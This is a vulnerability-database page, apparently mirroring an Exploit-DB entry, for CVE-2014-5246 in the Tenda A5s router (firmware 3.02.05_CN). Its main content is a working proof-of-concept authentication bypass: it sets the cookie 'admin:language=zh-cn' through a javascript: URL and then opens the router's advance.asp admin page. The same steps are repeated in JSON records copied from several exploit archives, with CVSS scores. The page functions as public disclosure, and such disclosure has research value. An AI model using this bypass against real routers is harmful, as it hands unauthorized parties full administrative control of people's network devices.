Search...

Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability

2014-08-18T00:00:00

ID EDB-ID:34361
Type exploitdb
Reporter zixian
Modified 2014-08-18T00:00:00

Description

Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability. CVE-2014-5246. Webapps exploit for hardware platform

                                        
                                            -----------------------------------------------------------------------
          Tenda A5s Router Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author      : zixian
Mail        : me@zixian.org
Date        : Aug, 17-2014
 
Vendor      : http://tenda.com.cn/
Link        : http://tenda.com.cn/Catalog/Product/223
Version     : V3.02.05_CN
CVE         : CVE-2014-5246
 
Exploit & p0c
_____________
 
go to
    http://192.168.2.1/
 
then set cookie with javascript
 
    javascript:document.cookie='admin:language=zh-cn'

go to
    http://192.168.2.1/advance.asp

you are the admin!
_____________

JSON Vulners Source

Initial Source

{"id": "EDB-ID:34361", "hash": "bef94c61441261cca5e1370fa58b96fb", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability", "description": "Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability. CVE-2014-5246. Webapps exploit for hardware platform", "published": "2014-08-18T00:00:00", "modified": "2014-08-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/34361/", "reporter": "zixian", "references": [], "cvelist": ["CVE-2014-5246"], "lastseen": "2016-02-03T21:01:29", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-5246"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127905"]}, {"type": "zdt", "idList": ["1337DAY-ID-22530"]}, {"type": "seebug", "idList": ["SSV:87199"]}], "modified": "2016-02-03T21:01:29"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/34361/", "sourceData": "-----------------------------------------------------------------------\r\n Tenda A5s Router Authentication Bypass Vulnerability\r\n-----------------------------------------------------------------------\r\nAuthor : zixian\r\nMail : me@zixian.org\r\nDate : Aug, 17-2014\r\n \r\nVendor : http://tenda.com.cn/\r\nLink : http://tenda.com.cn/Catalog/Product/223\r\nVersion : V3.02.05_CN\r\nCVE : CVE-2014-5246\r\n \r\nExploit & p0c\r\n_____________\r\n \r\ngo to\r\n http://192.168.2.1/\r\n \r\nthen set cookie with javascript\r\n \r\n javascript:document.cookie='admin:language=zh-cn'\r\n\r\ngo to\r\n http://192.168.2.1/advance.asp\r\n\r\nyou are the admin!\r\n_____________\r\n", "osvdbidlist": ["110146"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-09-08T10:26:56", "bulletinFamily": "NVD", "description": "The Shenzhen Tenda Technology Tenda A5s router with firmware 3.02.05_CN allows remote attackers to bypass authentication and gain administrator access by setting the admin:language cookie to zh-cn.", "modified": "2017-09-07T21:29:04", "published": "2014-08-22T10:55:08", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5246", "id": "CVE-2014-5246", "title": "CVE-2014-5246", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:17", "bulletinFamily": "exploit", "description": "", "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "href": "https://packetstormsecurity.com/files/127905/Tenda-A5s-Router-Authentication-Bypass.html", "id": "PACKETSTORM:127905", "type": "packetstorm", "title": "Tenda A5s Router Authentication Bypass", "sourceData": "`----------------------------------------------------------------------- \nTenda A5s Router Authentication Bypass Vulnerability \n----------------------------------------------------------------------- \nAuthor : zixian \nMail : me@zixian.org \nDate : Aug, 17-2014 \n \nVendor : http://tenda.com.cn/ \nLink : http://tenda.com.cn/Catalog/Product/223 \nVersion : V3.02.05_CN \nCVE : CVE-2014-5246 \n \nExploit & p0c \n_____________ \n \ngo to \nhttp://192.168.2.1/ \n \nthen set cookie with javascript \n \njavascript:document.cookie='admin:language=zh-cn' \n \ngo to \nhttp://192.168.2.1/advance.asp \n \nyou are the admin! \n_____________ \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127905/tenda-bypass.txt"}], "zdt": [{"lastseen": "2018-04-02T01:28:59", "bulletinFamily": "exploit", "description": "Tenda A5s router suffers from an authentication bypass vulnerability due to improperly trusting cookies.", "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "1337DAY-ID-22530", "href": "https://0day.today/exploit/description/22530", "type": "zdt", "title": "Tenda A5s Router Authentication Bypass", "sourceData": "-----------------------------------------------------------------------\r\nTenda A5s Router Authentication Bypass Vulnerability\r\n-----------------------------------------------------------------------\r\nAuthor : zixian\r\nMail : [email\u00a0protected]\r\nDate : Aug, 17-2014\r\n\r\nVendor : http://tenda.com.cn/\r\nLink : http://tenda.com.cn/Catalog/Product/223\r\nVersion : V3.02.05_CN\r\nCVE : CVE-2014-5246\r\n\r\nExploit & p0c\r\n_____________\r\n\r\ngo to\r\nhttp://192.168.2.1/\r\n\r\nthen set cookie with javascript\r\n\r\njavascript:document.cookie='admin:language=zh-cn'\r\n\r\ngo to\r\nhttp://192.168.2.1/advance.asp\r\n\r\nyou are the admin!\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22530"}], "seebug": [{"lastseen": "2017-11-19T13:14:11", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-08-20T00:00:00", "published": "2014-08-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87199", "id": "SSV:87199", "type": "seebug", "title": "Tenda A5s Router 3.02.05_CN \u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7", "sourceData": "\n -----------------------------------------------------------------------\r\n Tenda A5s Router Authentication Bypass Vulnerability\r\n-----------------------------------------------------------------------\r\nAuthor : zixian\r\nMail : me@zixian.org\r\nDate : Aug, 17-2014\r\n \r\nVendor : http://tenda.com.cn/\r\nLink : http://tenda.com.cn/Catalog/Product/223\r\nVersion : V3.02.05_CN\r\nCVE : CVE-2014-5246\r\n \r\nExploit & p0c\r\n_____________\r\n \r\ngo to\r\n http://192.168.2.1/\r\n \r\nthen set cookie with javascript\r\n \r\n javascript:document.cookie='admin:language=zh-cn'\r\n \r\ngo to\r\n http://192.168.2.1/advance.asp\r\n \r\nyou are the admin!\r\n_____________\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87199", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}